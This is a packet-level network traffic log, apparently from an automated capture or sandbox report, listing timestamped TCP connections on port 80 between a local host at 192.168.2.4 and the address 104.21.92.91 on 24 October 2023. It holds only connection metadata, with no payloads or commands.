Oct 24, 2023 00:06:16.894906044 CEST	80	49759	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:16.894978046 CEST	49759	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:16.895720959 CEST	49759	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:16.896447897 CEST	49759	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:16.991710901 CEST	80	49759	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:16.991781950 CEST	80	49759	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:17.363092899 CEST	80	49759	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:17.363121033 CEST	80	49759	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:17.363329887 CEST	49759	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:17.365379095 CEST	49759	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:17.415409088 CEST	49760	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:17.510742903 CEST	80	49760	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:17.510849953 CEST	49760	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:17.511248112 CEST	49760	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:17.511970043 CEST	49760	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:17.605784893 CEST	80	49760	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:17.606251001 CEST	80	49760	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:17.983056068 CEST	80	49760	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:17.983086109 CEST	80	49760	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:17.983161926 CEST	49760	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:17.985269070 CEST	49760	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:18.031413078 CEST	49761	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:18.126355886 CEST	80	49761	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:18.126543999 CEST	49761	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:18.126688004 CEST	49761	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:18.127418041 CEST	49761	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:18.219799995 CEST	80	49761	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:18.220746040 CEST	80	49761	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:18.615617037 CEST	80	49761	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:18.615706921 CEST	80	49761	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:18.615806103 CEST	49761	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:18.618849039 CEST	49761	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:19.107455015 CEST	49762	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:19.200659990 CEST	80	49762	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:19.200891972 CEST	49762	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:19.201195002 CEST	49762	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:19.202380896 CEST	49762	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:19.294142008 CEST	80	49762	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:19.295295954 CEST	80	49762	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:19.295315027 CEST	80	49762	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:19.295368910 CEST	80	49762	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:19.295573950 CEST	80	49762	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:19.295696020 CEST	80	49762	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:19.295855045 CEST	80	49762	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:19.296144962 CEST	80	49762	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:19.582931995 CEST	80	49762	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:19.582956076 CEST	80	49762	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:19.583148003 CEST	49762	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:19.586086988 CEST	49762	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:19.658484936 CEST	49763	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:19.770376921 CEST	80	49763	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:19.770499945 CEST	49763	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:19.770816088 CEST	49763	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:19.771917105 CEST	49763	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:19.864281893 CEST	80	49763	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:19.865009069 CEST	80	49763	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:20.248287916 CEST	80	49763	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:20.248308897 CEST	80	49763	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:20.248405933 CEST	49763	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:20.251529932 CEST	49763	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:20.323762894 CEST	49764	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:20.416949034 CEST	80	49764	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:20.417068958 CEST	49764	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:20.417365074 CEST	49764	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:20.418488026 CEST	49764	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:20.510380030 CEST	80	49764	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:20.511518955 CEST	80	49764	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:20.759413004 CEST	80	49764	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:20.759529114 CEST	80	49764	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:20.759613037 CEST	49764	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:20.762588978 CEST	49764	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:20.822000980 CEST	49765	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:20.915163040 CEST	80	49765	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:20.915484905 CEST	49765	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:20.915882111 CEST	49765	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:20.917018890 CEST	49765	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:21.008954048 CEST	80	49765	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:21.010078907 CEST	80	49765	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:21.387351990 CEST	80	49765	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:21.387389898 CEST	80	49765	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:21.387434959 CEST	49765	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:21.390367985 CEST	49765	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:21.452208996 CEST	49766	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:21.545320988 CEST	80	49766	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:21.545510054 CEST	49766	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:21.545959949 CEST	49766	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:21.547091961 CEST	49766	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:21.638751984 CEST	80	49766	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:21.639873028 CEST	80	49766	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:22.013473034 CEST	80	49766	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:22.013528109 CEST	80	49766	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:22.013596058 CEST	49766	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:22.020503998 CEST	49766	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:22.080914021 CEST	49767	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:22.173979044 CEST	80	49767	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:22.174088001 CEST	49767	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:22.174597979 CEST	49767	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:22.175769091 CEST	49767	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:22.267406940 CEST	80	49767	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:22.268682003 CEST	80	49767	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:22.639669895 CEST	80	49767	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:22.639708042 CEST	80	49767	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:22.639791012 CEST	49767	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:22.642797947 CEST	49767	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:22.845168114 CEST	49768	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:22.938317060 CEST	80	49768	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:22.938441038 CEST	49768	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:22.938721895 CEST	49768	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:22.939910889 CEST	49768	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:23.031807899 CEST	80	49768	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:23.031896114 CEST	49768	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:23.033658028 CEST	80	49768	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:23.033675909 CEST	80	49768	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:23.033689022 CEST	80	49768	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:23.033710957 CEST	80	49768	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:23.033725977 CEST	80	49768	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:23.033737898 CEST	49768	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:23.033740044 CEST	80	49768	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:23.033791065 CEST	80	49768	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:23.033866882 CEST	80	49768	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:23.033900976 CEST	80	49768	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:23.125009060 CEST	80	49768	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:23.126754045 CEST	80	49768	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:23.126787901 CEST	80	49768	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:23.126801968 CEST	80	49768	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:23.126887083 CEST	80	49768	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:23.126926899 CEST	80	49768	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:23.126979113 CEST	80	49768	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:23.552362919 CEST	80	49768	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:23.552388906 CEST	80	49768	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:23.552582979 CEST	49768	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:23.554406881 CEST	49768	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:39.637651920 CEST	49769	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:39.730987072 CEST	80	49769	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:39.731106997 CEST	49769	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:39.731770039 CEST	49769	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:39.732667923 CEST	49769	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:39.825329065 CEST	80	49769	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:39.826498985 CEST	80	49769	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:40.155925989 CEST	80	49769	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:40.155950069 CEST	80	49769	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:40.156063080 CEST	49769	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:40.158004999 CEST	49769	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:40.223582029 CEST	49770	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:40.316816092 CEST	80	49770	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:40.316963911 CEST	49770	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:40.317655087 CEST	49770	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:40.320360899 CEST	49770	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:40.411293030 CEST	80	49770	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:40.414316893 CEST	80	49770	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:40.613431931 CEST	80	49770	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:40.613487959 CEST	80	49770	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:40.613563061 CEST	49770	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:40.615684032 CEST	49770	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:40.659724951 CEST	49771	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:40.753308058 CEST	80	49771	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:40.753387928 CEST	49771	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:40.754017115 CEST	49771	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:40.755589962 CEST	49771	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:40.847394943 CEST	80	49771	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:40.848795891 CEST	80	49771	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:41.056915045 CEST	80	49771	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:41.056971073 CEST	80	49771	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:41.057039976 CEST	49771	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:41.060089111 CEST	49771	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:41.075054884 CEST	49772	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:41.168626070 CEST	80	49772	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:41.168760061 CEST	49772	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:41.169070959 CEST	49772	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:41.170149088 CEST	49772	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:41.264324903 CEST	80	49772	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:41.264866114 CEST	80	49772	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:41.577984095 CEST	80	49772	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:41.578036070 CEST	80	49772	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:41.578155994 CEST	49772	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:41.585727930 CEST	49772	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:41.629069090 CEST	49773	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:41.722522974 CEST	80	49773	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:41.722958088 CEST	49773	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:41.723772049 CEST	49773	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:41.726418972 CEST	49773	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:41.817531109 CEST	80	49773	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:41.820100069 CEST	80	49773	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:42.142965078 CEST	80	49773	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:42.143019915 CEST	80	49773	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:42.143131018 CEST	49773	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:42.146132946 CEST	49773	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:42.180816889 CEST	49774	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:42.274097919 CEST	80	49774	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:42.274229050 CEST	49774	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:42.274557114 CEST	49774	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:42.275947094 CEST	49774	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:42.368340969 CEST	80	49774	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:42.370274067 CEST	80	49774	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:42.701024055 CEST	80	49774	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:42.701081991 CEST	80	49774	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:42.701132059 CEST	49774	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:42.708535910 CEST	49774	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:42.725402117 CEST	49775	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:42.820401907 CEST	80	49775	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:42.820543051 CEST	49775	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:42.820894003 CEST	49775	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:42.822035074 CEST	49775	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:42.914486885 CEST	80	49775	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:42.915345907 CEST	80	49775	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:43.297738075 CEST	80	49775	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:43.297795057 CEST	80	49775	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:43.297864914 CEST	49775	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:43.303997993 CEST	49775	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:43.630651951 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:43.724507093 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:43.724689007 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:43.725397110 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:43.728351116 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:43.818798065 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:43.818947077 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:43.823115110 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:43.823152065 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:43.823263884 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:43.823266983 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:43.823348045 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:43.823364973 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:43.823443890 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:43.823968887 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:43.824053049 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:43.824057102 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:43.824091911 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:43.824124098 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:43.824125051 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:43.824196100 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:43.824197054 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:43.824340105 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:43.912605047 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:43.912708998 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:43.917716026 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:43.917752028 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:43.917785883 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:43.917792082 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:43.917818069 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:43.917821884 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:43.917850018 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:43.917855978 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:43.917881012 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:43.917906046 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:43.917923927 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:43.917992115 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:43.918162107 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:43.918234110 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:43.918275118 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:43.918335915 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:43.918499947 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:43.918566942 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:43.918776989 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:43.918845892 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:43.960397959 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:43.960500956 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.006728888 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.006829023 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.013109922 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.013147116 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.013185024 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.013216972 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.013247967 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.013376951 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.013436079 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.013468027 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.013508081 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.013535023 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.013668060 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.013700008 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.013720036 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.013744116 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.013771057 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.013845921 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.013850927 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.013878107 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.013900995 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.013910055 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.013930082 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.013941050 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.013957024 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.013992071 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.014095068 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.014127970 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.014146090 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.014159918 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.014173031 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.014218092 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.014231920 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.014290094 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.014421940 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.014483929 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.014486074 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.014517069 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.014534950 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.014548063 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.014568090 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.014600992 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.014621019 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.014652014 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.014672041 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.014708042 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.054160118 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.054198980 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.054419994 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.100522995 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.100558996 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.100594044 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.100666046 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.100727081 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.100919008 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.101032019 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.112729073 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.112821102 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.112878084 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.112914085 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.112946033 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.112962961 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.112977982 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.113034010 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.113106966 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.113107920 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.113142014 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.113173008 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.113184929 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.113245964 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.113254070 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.113317966 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.113318920 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.113349915 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.113382101 CEST	80	49776	104.21.92.91	192.168.2.4
Oct 24, 2023 00:06:44.113393068 CEST	49776	80	192.168.2.4	104.21.92.91
Oct 24, 2023 00:06:44.113461018 CEST	49776	80	192.168.2.4	104.21.92.91
